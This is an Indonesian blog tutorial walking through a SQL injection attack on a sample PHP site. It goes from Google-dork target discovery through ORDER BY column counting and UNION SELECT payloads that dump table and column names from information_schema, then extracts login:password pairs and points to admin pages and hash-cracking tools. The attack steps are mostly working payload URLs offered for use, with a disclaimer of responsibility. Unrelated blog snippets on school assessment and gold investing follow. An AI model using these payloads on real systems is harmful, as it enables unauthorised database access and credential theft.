SQLi Step by Step

Bismilah hirahman nirahim


Special thanks to vyc0d | bobyhikaru | Indonesian Hacker ,,thx bro you are my inspiration !!!!


Step by Step SQL injection


===[1]===

Mencari target,,
untuk mencari target kalian dapat memakai google dorks untuk SQLi

contoh : http://www.malingshit.my/ganyang.php?id=69

===[2]===

Setelah menemukan target , langkah berikutnya adalah mengecek apakah target dapat di inject atau tidak.
cara mengecek dengan menambahkan karakter ' atau - pada akhir alamat url.

contoh : http://www.malingshit.my/ganyang.php?id=69'

http://www.malingshit.my/ganyang.php?id=69-

jika ditemukan error seperti

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/u198/domain/malingshit.my/ganyang.php on line 69
maka target tersebut vuln / dapat di inject.

===[3]===

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+ atau /**/order/**/by/**/
contoh:

http://www.malingshit.my/ganyang.php?id=69+order+by+1--
sekarang cek secara satu per satu

contoh:
http://www.malingshit.my/ganyang.php?id=69+order+by+1--
http://www.malingshit.my/ganyang.php?id=69+order+by+2--
hingga
http://www.malingshit.my/ganyang.php?id=69+order+by+12--
http://www.malingshit.my/ganyang.php?id=69+order+by+13--
sehingga muncul error atau hilang pesan error...

misal:

http://www.malingshit.my/ganyang.php?id=69+order+by+13--

berarti yang kita ambil adalah sampai angka 12
===[4]===

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 13
gunakan perintah : +and+1=2+union+select+ atau /**/union/**/select/**/ atau /**/UNION/**/ALL/**/SELECT/**/

maka:

http://www.malingshit.my/ganyang.php?id=69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
maka akan muncul angka 4 ,7 , 8 ( ini yang disebut magic number)

gunakan perintah version() untuk mengecek versi sql yg dipakai , user() untuk mengetahui nama user, database() untuk mengetahui nama database ,masukan perintah tsb pada angka yg keluar tadi

contoh:
http://www.malingshit.my/ganyang.php?id=69+and+1=2+union+select+1,2,3,version%28%29,5,6,user%28%29,database%28%29,9,10,11,12--

lihat versi yg digunakan, jika versi 4.x.x.xx tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah +from+information_schema
untuk versi 5.x.x.xx berarti anda beruntung tidak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah +from+information_schema

===[5]===

Untuk menampilkan semua isi dari table tersebut adalah


perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi dan


perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir
contoh:

http://www.malingshit.my/ganyang.php?id=69+and+1=2+union+select+1,2,3,group_concat%28table_name%29,5,6,user%28%29,database%28%29,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29--

cari table dengan nama seperti

user, usr, username, user_name, login, user_admin, name, admin_user, dll

di dalam tersebut biasanya tersimpan username dan password.

dalam contoh ini adalah users
ubah dulu kata users ke dalam hexa memakai tool ini r3m1ck converter tool

hasilnya adalah 75 73 65 72 73 ,hilangkan spasinya menjadi 7573657273

===[6]===

Mencari isi table

Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi


perintah : +from+information_schema.columns+where+table_name=0xhexa--

-> dimasukan setelah angka terakhir

ganti hexa dengan kata users yg sudah di convert ke hexa
contoh :

http://www.malingshit.my/ganyang.php?id=69+and+1=2+union+select+1,2,3,group_concat(column_name)
,5,6,user(),database(),9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273--

maka isi dari table users adalah


id,login,password


===[7]===


Melihat isi dari column id , login password.


gunakan perintah : group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi


perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir


contoh: http://www.malingshit.my/ganyang.php?id=69+and+1=2+union+select+1,2,3,group_concat%28login,0x3a,password%20%29,5,6,user%28%29,database%28%29,9,10,11,12+from+users--


0x3a adalah tanda : (titik dua )


===[8]===


Langkah terakhir adalah mencari halaman login admin, bisa menggunkan tool disini

jika anda mendapati username+password yang di encrypt maka anda dapat menggunakan tool ini atau ini

Silahkan mencoba,semoga tutorial ini berguna untuk pembelajaran. penulis tidak bertanggung jawab atas kerusakan yang anda perbuat.



DOWNLOAD note



Komentar

Posting Komentar

Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!

Postingan populer dari blog ini

PEDOMAN DAN INSTRUMEN PENILAIAN KINERJA KEPALA SEKOLAH

PEDOMAN DAN INSTRUMEN PENILAIAN KINERJA KEPALA SEKOLAH DI LINGKUNGAN PEMERINTAH KABUPATEN KEBUMEN I. PENDAHULUAN A. DASAR 1. Undang-Undang Nomor 43 Tahun 1999 tentang Perubahan Atas Undang-Undang Nomor 8 Tahun 1974 tentang Pokok Pokok Kepegawaian ; 2. Undang-Undang Nomor 20 Tahun 2003 Tentang Sistem Pendidikan Nasional; 3. Undang-Undang Nomor 10 Tahun 2004 Tentang Pembentukan Peraturan Perundang-undangan; 4. Undang-Undang Nomor 32 Tahun 2004 Tentang Pemerintahan Daerah. 5. Keputusan Menteri Pendidikan Nasional Nomor 162/U/2003 tentang Pedoman Penugasan Guru sebagai Kepala Sekolah. 6. Rambu-rambu penilaian Kinerja Sekolah oleh Direktur Jenderal Pendidikan Dasar dan Menengah tanggal 15 Oktober 1999. 7. Rambu-rambu Penilaian Kinerja Sekolah oleh Direktur Jenderal Pendidikan Dasar dan Menengah tanggal 1 September 2000. 8. Keputusan Bupati Kebumen Nomor ..... Tahun 2006 tentang Penugasan Guru Pegawai Negeri Sipil yang diberi tugas tambahan sebagai Kepala Sekolah di Lingkungan Peme
Baca selengkapnya

Sejarah SMA N 2 Kebumen

Sejarah SMA N 2 Kebumen Sebagaimana termuat dalam pembukaan UUD 1945, bahwa salah satu tujuan Negara Indonesia adalah mencerdaskan kehidupan bangsa. Untuk dapat mewujudkan hal tersebut perlu adanya sarana dan prasaranapendukug demi tercapainya tujuan tersebut. Upaya yang bisa ditempuh antara lain dengan penyediaan sarana pendidikan sebagai wahana pencerdasan dan pendewasaan bangsa. Seiring dengan bertambahnya penduduk khususnya kabupaten Kebumen,maka kebutuhan akan penyediaan sarana pendidikan yang berupa sekolah sangat diperlukan, khususnya untuk wilayah perkotaan. Hal itu mengngat bahwa di wilayah perkotaan baru ada 1(satu) Sekolah Menengah Atas, yaitu SMA Negeri Kebumen. Untuk Kabupaten Kebumen pada tahun 1987 terdapat 5 (lima) Sekolah Menengah Atas yang tersebar di 5(lima)kecamatan, yaitu: 1.SMA Negeri Kebumen, berdiri tanggal 1 Agustus 1958 2.SMA Negeri Gombong, berdiri tanggal 16 Agustus 1965 3.SMA Negeri Prembun, berdiri tanggal 9 Agustus 1982 4.SMA Negeri Kutowinangun, be
Baca selengkapnya

Investing in gold

Gold   investing   is   a   profitable business.   Why ?   because   the price   of   buy  gold   bullion   is always  high , So   we   will   not   feel   loss ,   although the   loss   would not have   much ,   we 'll   even   make a profit very   much . There are   several   types of   gold   that   can be   invested ,   in the form of   gold   coin   or   gold   coin and   gold   is   shaped   bars   or   called   gold   bullion . of   some   kind   there are   differences in   each .   By   buying   gold   coins   or   bullion  of   this   we   will be able to   invest   long term .  while the   gold IRA   is   gold   that   has a   high   exchange value   or   investment   value   of gold compared   with   other or buy bullion .
Baca selengkapnya